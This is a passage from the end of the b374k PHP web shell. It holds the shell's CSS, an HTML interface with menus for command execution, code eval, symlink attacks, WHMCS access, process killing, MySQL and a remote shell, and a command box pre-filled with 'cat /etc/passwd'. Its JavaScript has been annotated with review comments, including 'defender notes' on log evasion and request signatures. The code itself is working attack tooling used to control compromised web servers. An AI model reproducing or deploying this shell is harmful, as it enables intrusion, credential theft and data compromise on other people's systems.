  2810. .explore tr:hover{background:<?php echo $s_color[8];?>;}
  2811. .sembunyi{display:none;margin:0;padding:0;}
  2812. .info table{width:100%;border-radius:6px;border:1px solid <?php echo $s_color[3];?>;margin:4px 0;padding:8px;}
  2813. .info th,th{background:<?php echo $s_color[8];?>;font-weight:700;}
  2814. .info td{border-bottom:1px solid <?php echo $s_color[2];?>;}
  2815. .info h2{text-align:center;font-size:15px;background:<?php echo $s_color[8];?>;letter-spacing:6px;border-radius:6px;border-bottom:1px solid <?php echo $s_color[3];?>;margin:4px 0 8px;padding:10px;}
  2816. .info a{color:<?php echo $s_color[10];?>;}
  2817. .viewfile{width:100%;border-bottom:1px solid <?php echo $s_color[2];?>;margin:0 0 4px;}
  2818. .viewfile td{border-bottom:1px solid <?php echo $s_color[2];?>;background:<?php echo $s_color[8];?>;height:24px;padding:2px 4px;}
  2819. .viewfilecontent{padding:11px 8px;}
  2820. .mybox{-moz-border-radius:10px;border-radius:10px;border:1px solid <?php echo $s_color[3];?>;margin:4px 0 8px;padding:14px 8px;}
  2821. .mybox h2{border-bottom:1px solid <?php echo $s_color[9];?>;color:<?php echo $s_color[3];?>;margin:0;padding:0 0 8px;}
  2822. .notif{background:<?php echo $s_color[3];?>;color:<?php echo $s_color[0];?>;border-radius:6px;font-weight:700;margin:3px 0;padding:4px 8px 2px;}
  2823. .notif a{color:<?php echo $s_color[0];?>;}
  2824. .footer{text-align:right;font-size:10px;letter-spacing:2px;color:<?php echo $s_color[2];?>;padding:0 16px;}
  2825. .headtbl,.myboxtbl{width:100%;}
  2826. input[type=checkbox].css-checkbox + label.css-label{padding-left:20px;height:15px;display:inline-block;line-height:15px;background-repeat:no-repeat;background-position:0 0;vertical-align:middle;cursor:pointer;}
  2827. input[type=checkbox].css-checkbox:checked + label.css-label{background-position:0 -15px;}
  2828. .info,.info h1,.info hr,input[type=checkbox].css-checkbox{display:none;}
  2829. .css-label{background-image:url(<?php echo $s_checkbox;?>);}
  2830. .drive-letter{color:<?php echo $s_color[1];?>;}
  2831. .desc{color:<?php echo $s_color[11];?>;}
  2832. .cbox_selected{background-color:<?php echo $s_color[12];?>;}
  2833. .cbox_all{text-align:center;text-indent:4px;}
  2834. .schemabox{background-color:<?php echo $s_color[3];?>;border-radius:2px;}
  2835. .border-bottom{border-bottom:1px solid <?php echo $s_color[7];?>;}
  2836. .border-top{border-top:1px solid <?php echo $s_color[7];?>;}
  2837. </style>
  2838. </head><body>
  2839. <table id='main'>
  2840. <tr><td><?php if($s_auth){?><div>
  2841. <span style='float:right;'>
  2842. <a href='<?php echo $s_self; ?>x=logout' onclick='return false;' title='Click me to log out'>[ LOG OUT ]</a> | <a href='<?php echo $s_self;?>x=switch' onclick='return false;' title='Click me to change theme'>
  2843. [ THEME ]</a></span>
  2844.  
  2845. <table id='header'><tr>
  2846. <td style='width:100px;'>
  2847. <table><tr>
  2848. <td align='center'><h1><a href='<?php echo $s_self."cd=".cp(dirname(realpath($_SERVER['SCRIPT_FILENAME']))); ?>' onclick='return false;'>b374k</a></h1>
  2849. v.<?php echo $s_ver; ?></td></tr>
  2850. <tr><td align='center'><h1><div class='ver'> 4m4t3r45u</div></h1>
  2851. </td></tr>
  2852. </table>
  2853. </td>
  2854.  
  2855. <td><div class='headinfo'><?php echo $s_info; ?></div></td>
  2856. </tr></table></div>
  2857.  
  2858. <div style='clear:both;'></div>
  2859.  
  2860. <form method='post' name='g'></form>
  2861. <div id='menu'>
  2862. <table style='width:100%;'><tr>
  2863. <td align='center'><a href='<?php echo $s_self; ?>' title='Explorer' onclick='return false;'>
  2864. <div class='menumi'>Explore</div></a></td>
  2865. <td align='center'> <a href='<?php echo $s_self; ?>x=jumping' title='Readable' onclick='return false;'>
  2866. <div class='menumi'>Jumping</div></a></td>
  2867. <td align='center'> <a href='<?php echo $s_self; ?>x=symlink' title='Symlink' onclick='return false;'>
  2868. <div class='menumi'>Symlink</div></a></td>
  2869. <td align='center'> <a href='<?php echo $s_self; ?>x=whmcs' title='Whmcs' onclick='return false;'>
  2870. <div class='menumi'>Whmcs</div></a></td>
  2871. <td align='center'> <a href='<?php echo $s_self; ?>x=ps' title='Display process status' onclick='return false;'>
  2872. <div class='menumi'>Proccess</div></a></td>
  2873. <td align='center'> <a href='<?php echo $s_self; ?>x=eval' title='Execute code' onclick='return false;'>
  2874. <div class='menumi'>Eval</div></a></td>
  2875. <td align='center'> <a href='<?php echo $s_self; ?>x=info' title='Information about server' onclick='return false;'>
  2876. <div class='menumi'>Info</div></a></td>
  2877. <td align='center'> <a href='<?php echo $s_self; ?>x=db' title='Connect to database' onclick='return false;'>
  2878. <div class='menumi'>Mysql</div></a></td>
  2879. <td align='center'> <a href='<?php echo $s_self; ?>x=rs' title='Remote Shell' onclick='return false;'>
  2880. <div class='menumi'>Remote</div></a></td>
  2881.  
  2882. </td></tr></table></div>
  2883. <div id='menu'><table><tr>
  2884. <td style='width:100%;padding:0 0 0 6px;'> <form action='<?php echo $s_self; ?>' method='post'>
  2885. <span class='prompt'><?php echo $s_prompt; ?></span>
  2886. <input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd' style='width:70%;' value='<?php
  2887. if(isset($_REQUEST['cmd'])) echo "";
  2888. else echo "cat /etc/passwd";
  2889. ?>' /><noscript>
  2890. <input class='inputzbut' type='submit' value='Go !' name='submitcmd' style='width:80px;' />
  2891. </noscript></form></td></tr></table>
  2892. </div>
  2893. <div id='content' id='box_shell'>
  2894. <div id='result'><?php echo $s_result; ?></div>
  2895. </div>
  2896.  
  2897. <?php }else{ ?>
  2898. <div style='width:100%;text-align:center;'>
  2899. <form action='<?php echo $s_self; ?>' method='post'>
  2900. <img src='<?php echo $s_favicon; ?>' style='margin:2px;vertical-align:middle;' />
  2901. <input id='login' class='inputz' type='password' name='login' style='width:120px;' value='' />
  2902. <input class='inputzbut' type='submit' value='Go !' name='submitlogin' style='width:80px;' />
  2903. </form></div>
  2904.  
  2905. <?php } ?>
  2906. </td></tr></table>
  2907. <p class='footer'>b374k ReCoD3d By Andripzf</p>
  2908. <p class='footer'>Jayalah Indonesiaku &copy;<?php echo @date("Y",time())." "; ?>b374k Shell</p>
  2909.  
  2910. <script type='text/javascript'><?php echo gzinflate(base64_decode($s_sortable_js)); ?></script>
  2911. <script type='text/javascript'>
  // Page-level state: `d` aliases document; `hexstatus` is the one-shot guard
  // read and set by submithex().
  2912. var d = document;
  2913. var hexstatus = false;
  // On load: focus the field matching the request parameter the server saw
  // (the PHP below emits one focus statement per parameter present), switch
  // off browser autocomplete on the command box, wire textarea shortcuts and
  // finally hook every link through listen().
  2914. window.onload=function(){
  2915. <?php if(isset($_REQUEST['cmd'])) echo "if(d.getElementById('cmd')) d.getElementById('cmd').focus();"; ?>
  2916. <?php if(isset($_REQUEST['evalcode'])) echo "if(d.getElementById('evalcode')) d.getElementById('evalcode').focus();"; ?>
  2917. <?php if(isset($_REQUEST['sqlcode'])) echo "if(d.getElementById('sqlcode')) d.getElementById('sqlcode').focus();"; ?>
  2918. <?php if(isset($_REQUEST['login'])) echo "if(d.getElementById('login')) d.getElementById('login').focus();"; ?>
  2919.  
  2920. if(d.getElementById('cmd')) d.getElementById('cmd').setAttribute('autocomplete', 'off');
  2921. var textareas = d.getElementsByTagName('textarea');
  2922. var count = textareas.length;
  2923. for(i=0;i<count;i++){
  2924. textareas[i].onkeydown = function(e){
  // Tab (keyCode 9) inserts a literal tab at the caret instead of moving focus.
  2925. if(e.keyCode==9){
  2926. e.preventDefault();
  2927. var s = this.selectionStart;
  2928. this.value = this.value.substring(0,this.selectionStart) + "\t" + this.value.substring(this.selectionEnd);
  2929. this.selectionEnd = s+1;
  2930. }
  // Ctrl+Enter submits the form that owns the textarea.
  2931. else if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
  2932. this.form.submit();
  2933. }
  2934. }
  2935. }
  2936. listen();
  2937. }
  // Attaches a mousedown handler to every <a> on the page that passes the
  // link's href to go(). The template's anchors carry onclick='return false;',
  // so the browser's own navigation is suppressed and go() decides what is sent.
  // attachEvent is the fallback for browsers without addEventListener.
  2938. function listen(){
  2939. x = d.getElementsByTagName("a");
  2940. for(i=0;i<x.length;i++){
  2941. if(x[i].addEventListener) x[i].addEventListener ("mousedown", function(event){return go(this.href,event);},false);
  2942. else x[i].attachEvent ("onmousedown", function(event){return go(this.href,event);});
  2943. }
  2944. }
  // Turns a link click into a POST: the href is split at '?', each key=value
  // pair of the query string becomes a hidden input on the empty form named
  // 'g' (declared with method='post' in the template), and that form is
  // submitted to the part before the '?'. Hrefs that do not split into exactly
  // two parts are followed as a normal navigation. Right-clicks are ignored.
  //
  // Defender note: because of this, the x=/cd=/pid= style parameters seen in
  // the page's links travel in the request body, not in the URL, so they are
  // absent from the query string recorded in ordinary access logs; request-body
  // logging or inline inspection is needed to see them.
  //
  // t   - href of the clicked link
  // evt - the mousedown event (used only to detect the right button)
  2945. function go(t,evt){
  2946. if(evt.which === 3 || evt.button === 2) return false;
  2947.  
  2948. ts = t.split('?');
  2949. if(ts.length == 2){
  2950. var a = ts[0];
  2951. var v = ts[1];
  2952. var vs = v.split('&');
  2953. var g = d.forms['g'];
  2954.  
  // An empty path means "post back to the current page".
  2955. if(a=='') a='?';
  2956. g.action = a;
  2957. for(var i=0;i<vs.length;i++){
  2958. var vss = vs[i].split('=');
  // Pairs whose value itself contains '=' split into more than two parts
  // and are dropped; values are copied as-is, without URL-decoding.
  2959. if(vss.length == 2){
  2960. addinput(g,vss[0],vss[1]);
  2961. }
  2962. }
  2963. g.submit();
  2964. }
  2965. else window.location = t;
  2966. return false;
  2967. }
  // Swaps two elements: hides the element with id `l`, shows the one with id
  // `b`, and focuses an element with id `l` + '_' if one exists. Used by the
  // header to toggle between the path display and the path input form.
  2968. function tukar(l,b){
  2969. if(d.getElementById(l)) d.getElementById(l).style.display = 'none';
  2970. if(d.getElementById(b)) d.getElementById(b).style.display = 'block';
  2971. if(d.getElementById(l + '_')) d.getElementById(l + '_').focus();
  2972. }
  // Toggles the element with id `b` between display 'block' and 'none'.
  // Any other current display value (including unset) is treated as hidden
  // and switched to 'block'.
  2973. function toggle(b){
  2974. if(d.getElementById(b)){
  2975. if(d.getElementById(b).style.display == 'block') d.getElementById(b).style.display = 'none';
  2976. else d.getElementById(b).style.display = 'block'
  2977. }
  2978. }
  // Appends a hidden <input name=k value=v> to form `f`. This is how go(),
  // massactgo() and pkill() attach request fields before submitting a form.
  2979. function addinput(f,k,v){
  2980. var i = d.createElement('input');
  2981. i.type = 'hidden';
  2982. i.name = k;
  2983. i.value = v;
  2984. f.appendChild(i);
  2985. }
  // Clears the command box on click when it still holds the placeholder text
  // '- shell command -'. NOTE(review): the template in this listing pre-fills
  // the box with a different default string, so this comparison does not match
  // that default.
  2986. function clickcmd(){
  2987. var buff = d.getElementById('cmd');
  2988. if(buff.value == '- shell command -') buff.value = '';
  2989. }
  // Submits the form owning the form control `what`, then resets that control's
  // selectedIndex to 0 (so `what` is presumably a <select>; its markup is not
  // in this part of the file).
  2990. function download(what){
  2991. what.form.submit();what.selectedIndex=0;
  2992. }
  // Key filter for hex-editor row `t` (input id 'hex_'+t). Returns false for
  // Enter, Delete, Backspace and Space, and for Up/Down after moving focus to
  // the neighbouring row while keeping the caret column. Other keys fall
  // through with no return value.
  // `q` (the 'dump_'+t element) is looked up but not used here.
  2993. function hexfix(t,ev){
  2994. var r = d.getElementById('hex_'+t);
  2995. var q = d.getElementById('dump_'+t);
  2996. var curpos = getcurpos(r);
  2997.  
  // 13 = Enter, 46 = Delete, 8 = Backspace, 32 = Space
  2998. if(ev.keyCode==13 || ev.keyCode==46 || ev.keyCode==8 || ev.keyCode==32) return false;
  2999. //down
  3000. if(ev.keyCode==40){
  3001. var s = d.getElementById('hex_'+(parseInt(t)+1));
  3002. if(s){clearpos();s.focus();setcurpos(s,curpos,curpos);}
  3003. return false;
  3004. }//up
  3005. if(ev.keyCode==38){
  3006. var s = d.getElementById('hex_'+(parseInt(t)-1));
  3007. if(s){clearpos();s.focus();setcurpos(s,curpos,curpos);}
  3008. return false;
  3009. }
  3010. }
  // Applies one keystroke to hex-editor row `t` and refreshes its ASCII dump.
  // The row text is treated as groups of three characters (two hex digits plus
  // a separator): a typed hex digit overwrites the character under the caret
  // unless the caret sits on a separator, then the caret advances by one.
  // The dump ('dump_'+t) is rebuilt from the row's hex pairs with the character
  // for the edited byte wrapped in a highlight <span>.
  3011. function hexupdate(t,ev){
  3012. var r = d.getElementById('hex_'+t);
  3013. var s = d.getElementById('dump_'+t);
  3014. var k = String.fromCharCode(ev.keyCode);
  3015. var a = '0123456789ABCDEF';
  3016. var hexs = r.value;
  3017. var hex = hexs.replace(/\s+/ig,'');
  3018. var curpos = getcurpos(r);
  3019.  
  3020. clearpos();
  // curpos%3 == 2 is the separator column; typing there changes nothing.
  3021. if(curpos%3!=2){
  3022. if(a.indexOf(k)>=0 && curpos<hexs.length){
  3023. chr = hexs.substr(curpos,1);
  3024. before = (curpos>=1)? hexs.substr(0,curpos):'';
  3025. after = (curpos<hexs.length)? hexs.substr(curpos+1):'';
  3026. r.value = before + k + after;
  3027. setcurpos(r,curpos+1,curpos+1);
  3028. }
  3029. }
  3030. if(r && s){
  3031. var str = '';
  3032. hexs = r.value;
  3033. hex = hexs.replace(/\s+/ig,'');
  3034. for(var i=0;i<hex.length;i+=2) str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  3035.  
  // Everything outside 0x21-0x7E, plus '<' and '>', is shown as '.' so the
  // string can be assigned to innerHTML below without creating tags.
  3036. str = str.replace(/[^\x21-\x7E]/ig,'.');
  3037. str = str.replace(/</ig,'.')
  3038. str = str.replace(/>/ig,'.')
  3039.  
  // Byte index of the caret, computed from the caret position read before
  // the edit above.
  3040. dmppos = Math.floor(curpos/3);
  3041. chr = str.substr(dmppos,1);
  3042. before = (dmppos>=1)? str.substr(0,dmppos):'';
  3043. after = (dmppos<str.length)? str.substr(dmppos+1):'';
  3044. finalstr = before + "<span class='gaya' style='background:#000;font-weight:bold;border-bottom:1px solid #fff;border-top:1px solid #fff;'>" + chr + "</span>" + after;
  3045. s.innerHTML = finalstr;
  3046. }
  3047. }
  // Gathers the hex editor into one field and submits it: concatenates the
  // values of inputs 'hex_0' .. 'hex_'+(counter-1), removes each of those
  // inputs from the page, strips all whitespace, writes the result into the
  // element with id 'hexestxtarea' and submits its form. The global
  // `hexstatus` flag makes this run only once per page load.
  3048. function submithex(){
  3049. if(!hexstatus){
  3050. hexstatus=true;
  3051. var hexstr = '';
  // Row count comes from the element with id 'counter' (markup not in this
  // part of the file).
  3052. var counter = d.getElementById('counter').value;
  3053. for(var i=0;i<counter;i++){
  3054. var hex = d.getElementById('hex_'+i);
  3055. hexstr+=hex.value;
  3056. hex.remove();
  3057. }
  3058. hexstr = hexstr.replace(/\s+/g,'');
  3059. var hexestxtarea = d.getElementById('hexestxtarea');
  3060. hexestxtarea.innerHTML = hexstr;
  3061. hexestxtarea.form.submit();
  3062. }
  3063. }
  // Change handler for a selector `e`: hides the element with id
  // 'additionaloption' (class 'sembunyi') when the selected value is 'php' and
  // shows it otherwise, then blanks the 'gccoption' field if that element exists.
  // NOTE(review): the reset uses the bare name `gccoption`, not the local `b`;
  // that only resolves where the browser exposes element ids as globals.
  3064. function evalselect(e){
  3065. var a = d.getElementById('additionaloption');
  3066. var b = d.getElementById('gccoption');
  3067. if(a){
  3068. if(e.value=='php') a.className='sembunyi';
  3069. else a.className='';
  3070. if(b) gccoption.value ='';
  3071. }
  3072. }
  // Returns the caret position inside text control `c`, or 0 when neither API
  // is available. The d.selection / createRange branch is the legacy
  // Internet Explorer path; other browsers use selectionStart.
  3073. function getcurpos(c){
  3074. var p = 0;
  3075. if(d.selection){
  3076. c.focus ();
  3077. var Sel = d.selection.createRange();
  3078. Sel.moveStart ('character', c.value.length);
  3079. p = Sel.text.length;
  3080. }
  // The == '0' comparison keeps a caret at position 0 from being skipped
  // by the truthiness test.
  3081. else if(c.selectionStart || c.selectionStart == '0')
  3082. p = c.selectionStart;
  3083. return p;
  3084. }
  // Focuses text control `c` and selects the range p1..p2 (a plain caret when
  // both are equal). Uses setSelectionRange where present, otherwise the
  // legacy createTextRange API; does nothing if neither exists.
  3085. function setcurpos(c,p1,p2){
  3086. if(c.setSelectionRange){
  3087. c.focus();
  3088. c.setSelectionRange(p1,p2);
  3089. }
  3090. else if(c.createTextRange){
  3091. var r = c.createTextRange();
  3092. r.collapse(true);
  3093. r.moveStart('character', p1);
  3094. r.moveEnd('character', p2);
  3095. r.select();
  3096. }
  3097. }
  // Strips every tag from the elements named 'hexdump', which removes the
  // highlight <span> that hexupdate() inserts into a dump cell.
  3098. function clearpos(){
  3099. var a = d.getElementsByName('hexdump');
  3100. for(var i=0;i<a.length;i++){
  3101. a[i].innerHTML = a[i].innerHTML.replace(/<[^>]+>/ig,'');
  3102. }
  3103. }
  // Sets the selection of the element with id 'type': index 1 for 'sdir',
  // index 0 for 'sfile'; any other value of `ty` leaves it unchanged.
  3104. function findtype(ty){
  3105. var z = d.getElementById('type');
  3106. if(z && (ty=='sdir')) z.selectedIndex = 1;
  3107. else if(z && (ty=='sfile')) z.selectedIndex = 0;
  3108. }
  // "Select all" handler: copies the state of the first 'abox' checkbox to
  // every 'cbox' checkbox and sets or clears the 'cbox_selected' class on each
  // checkbox's grandparent element (the table row in the markup above).
  3109. function checkall(){
  3110. var a = d.getElementsByName('cbox');
  3111. var b = d.getElementsByName('abox');
  3112. for(var i=0;i<a.length;i++){
  3113. a[i].checked = b[0].checked;
  3114. var c = a[i].parentElement.parentElement;
  3115. if(a[i].checked) c.className = 'cbox_selected';
  3116. else c.className = '';
  3117.  
  3118. }
  3119. }
  // Per-row onchange handler: sets the 'cbox_selected' class on the
  // checkbox's grandparent element when checked and clears it when unchecked.
  3120. function hilite(el){
  3121. var c = el.parentElement.parentElement;
  3122. if(el.checked) c.className = 'cbox_selected';
  3123. else c.className = '';
  3124. }
  // Runs the bulk action chosen in the element with id 'massact' over the
  // checked 'cbox' rows. The selection is passed through cookies, not form
  // fields: checked values are joined with '|' into a cookie named 'buffer',
  // and for cut/copy the action name is stored in a cookie named 'massact'
  // with no request sent. 'paste' submits the form with a hidden field
  // y=paste; any other action writes 'buffer' and submits with y=<action>.
  // Afterwards every checkbox and row highlight is cleared.
  //
  // Defender note: the 'massact' and 'buffer' cookies, and the 'y' request
  // field, are client-side artefacts of this feature that appear in traffic.
  3125. function massactgo(){
  3126. var a = d.getElementsByName('cbox');
  3127. var b = d.getElementById('massact');
  3128. var c = d.getElementsByName('abox');
  3129. var buffer = '';
  3130.  
  3131. if(b.value=='cut' || b.value=='copy'){
  3132. d.cookie='massact='+b.value+';';
  3133. for(var i=0;i<a.length;i++) if(a[i].checked) buffer += a[i].value+'|';
  3134. d.cookie='buffer='+escape(buffer);
  3135. }
  3136. else if(b.value=='paste'){
  3137. addinput(b.form,'y','paste');
  3138. b.form.submit();
  3139. }
  3140. else{
  3141. for(var i=0;i<a.length;i++) if(a[i].checked) buffer += a[i].value+'|';
  3142. d.cookie='buffer='+escape(buffer);
  3143. addinput(b.form,'y', b.value);
  3144. b.form.submit();
  3145. }
  3146. for(var i=0;i<a.length;i++){
  3147. a[i].checked = false;
  3148. a[i].parentElement.parentElement.className='';
  3149. }
  3150. c[0].checked = false;
  3151. }
  // "kill selected" handler of the process table: joins the values of the
  // checked 'cbox' rows (the pids rendered by the server) with '|' and, if any
  // are selected, submits the form owning the 'abox' checkbox with hidden
  // fields x=ps and pid=<list>. The server-side 'ps' branch earlier in this
  // file splits that list on '|' and passes each entry to posix_kill, or to a
  // kill / taskkill command line when posix_kill is unavailable.
  // Afterwards every checkbox and row highlight is cleared.
  //
  // Defender note: a POST carrying x=ps together with a '|'-separated pid
  // field is the request signature of this action.
  3152. function pkill(){
  3153. var a = d.getElementsByName('cbox');
  3154. var c = d.getElementsByName('abox');
  3155. var buffer = '';
  3156.  
  3157. for(var i=0;i<a.length;i++) if(a[i].checked) buffer += a[i].value+'|';
  3158.  
  3159. if(buffer!=''){
  3160. addinput(c[0].form,'x', 'ps');
  3161. addinput(c[0].form,'pid', buffer);
  3162. c[0].form.submit();
  3163. }
  3164.  
  3165. for(var i=0;i<a.length;i++){
  3166. a[i].checked = false;
  3167. a[i].parentElement.parentElement.className='';
  3168. }
  3169. c[0].checked = false;
  3170. }
  // Expires the cookie whose name is dbcon[id] by setting it to an empty value
  // with a 1970 expiry date. `dbcon` is not defined in this part of the file;
  // presumably it is emitted by the database page - verify against the rest
  // of the listing.
  3171. function dc(id){
  3172. document.cookie = dbcon[id] + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
  3173. }
  3174. </script>
  3175. </body>
  3176. </html><?php die(); ?>